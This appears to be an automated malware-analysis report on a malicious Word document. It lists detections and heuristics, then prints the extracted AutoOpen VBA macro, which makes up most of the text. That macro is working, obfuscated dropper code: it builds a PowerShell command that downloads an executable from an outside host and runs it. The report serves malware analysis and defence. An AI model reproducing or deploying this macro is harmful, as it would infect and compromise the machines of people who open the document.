Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The file contains a legacy WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The macro is heavily obfuscated and appears to be constructing commands to execute a secondary payload, likely a downloader. The ClamAV detection as 'Doc.Dropper.Agent' further supports this assessment. The primary IOC is the obfuscated command string constructed by the macro.
Heuristics (5)

- ClamAV: Doc.Dropper.Agent-7532226-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-7532226-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3365 bytes |

SHA-256 of macros.bas: bb583482276e683dba987aa1b393bf6da1c37708b293ca158ee957931a4a0968

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "BZRqYsjKl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Dim jXuRqV()
ReDim jXuRqV(2)
jXuRqV(0) = 50
jXuRqV(1) = 135650616
Dim NXujYS()
ReDim NXujYS(2)
NXujYS(0) = 12
NXujYS(1) = 7817601
Dim MDCwL()
ReDim MDCwL(3)
MDCwL(0) = 187301038
MDCwL(1) = 75479068
MDCwL(2) = 454090409
Dim zriij()
ReDim zriij(2)
zriij(0) = 9564
zriij(1) = 1839
Shell@ rXKVkXGl + RrLjqksu + WaBHpKXBrmsN, Format(0)
Dim urRzr()
ReDim urRzr(2)
urRzr(0) = 783
urRzr(1) = 46630952
Dim CsCTG()
ReDim CsCTG(4)
CsCTG(0) = 46
CsCTG(1) = 2826
CsCTG(2) = 6
CsCTG(3) = 994
Dim WmCoXj()
ReDim WmCoXj(2)
WmCoXj(0) = 1
WmCoXj(1) = 7
Dim HwrhU()
ReDim HwrhU(3)
HwrhU(0) = 627
HwrhU(1) = 7719
HwrhU(2) = 767
End Sub
Attribute VB_Name = "USDdzpzSs"
Function rXKVkXGl()
On _
Error _
Resume _
Next
Dim UtwrUn()
ReDim UtwrUn(2)
UtwrUn(0) = 199778218
UtwrUn(1) = 5
Dim NlPNT()
ReDim NlPNT(5)
NlPNT(0) = 41
NlPNT(1) = 2745
NlPNT(2) = 54773991
NlPNT(3) = 386194349
NlPNT(4) = 4584
hQZdbC = Format(Chr(0 + 5 + 10 + 15 + 69)) + "md /V^:^ON/" + Format(Chr(0 + 3 + 7 + 10 + 47)) + Format(Chr(0 + 1 + 3 + 4 + 26)) + "^se^t pr^" + "q=^ ^ ^ ^ ^ ^ ^" + " ^ ^ ^ ^ ^ }}^{^h" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "^t^a" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "}" + "^;k^aer^b;^X^L^K^$^" + " m^e^tI^-^ekovn^I^;)^" + "XL^K$^ ^,kB^m^$(" + "^el^iF^" + "da^o^ln^w^oD.^E^T" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "$^{yr^t" + "^{)^X^Z^" + "t^$ ni ^kBm^$(^h" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "aer^of^;'" + "^ex^e^.^'^+iv^o^$^+'^\'^+" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "^i^lb^u^p:vne^$^=X^LK" + "^$^;'^31^6^' "
Dim TPzNH()
ReDim TPzNH(5)
TPzNH(0) = 784
TPzNH(1) = 274362317
TPzNH(2) = 143594885
TPzNH(3) = 6
TPzNH(4) = 68
QjiYU = "= ^iv^o^$;)^'@'(t^ilpS.^'n^k^t" + "^.1^yl^i^q^=^l?^ph^" + "p^.^d^o^p" + "ovm^e^k/^EOX/^m" + "^o" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "^.^tr^akn^e^gav//:" + "p^t^t^"
Dim ziqzn()
ReDim ziqzn(2)
ziqzn(0) = 14
ziqzn(1) = 1
zzRKRzJEcsj = "h'^=X^Zt$;tne^il" + Format(Chr(0 + 3 + 7 + 10 + 47)) + "^be^W.teN^ t" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "^e^j^b^o-w^en=^ET" + Format(Chr(0 + 5 + 10 + 15 + 69)) + "^$" + " ^l^l^eh^sr" + "e^w^op&&fo" + "r /^L %^" + "F ^in (2^5^9;^-^1" + "^;0)^d^o ^s^et ^q^U=!^q^" + "U!!pr^q:~%^F,1!&&" + "^i^f %^F" + " ^eq^u ^0 " + Format(Chr(0 + 5 + 10 + 15 + 69)) + "^a^l^"
Dim IZGOPf()
ReDim IZGOPf(4)
IZGOPf(0) = 4437
IZGOPf(1) = 2
IZGOPf(2) = 890
IZGOPf(3) = 7
Dim BpzTj()
ReDim BpzTj(3)
BpzTj(0) = 3
BpzTj(1) = 251661304
BpzTj(2) = 4
Dim YVmsN()
ReDim YVmsN(3)
YVmsN(0) = 239070546
YVmsN(1) = 389
YVmsN(2) = 366532845
DUwbo = "l %^q^U:^~^-26^0%" + Format(Chr(0 + 1 + 3 + 4 + 26)) + ""
rXKVkXGl = hQZdbC + QjiYU + zzRKRzJEcsj + DUwbo
Dim HEwYKl()
ReDim HEwYKl(3)
HEwYKl(0) = 283193433
HEwYKl(1) = 18
HEwYKl(2) = 401
Dim lkWwRR()
ReDim lkWwRR(4)
lkWwRR(0) = 66
lkWwRR(1) = 257372954
lkWwRR(2) = 183638031
lkWwRR(3) = 1298
Dim IzNOlw()
ReDim IzNOlw(2)
IzNOlw(0) = 441444435
IzNOlw(1) = 3
End Function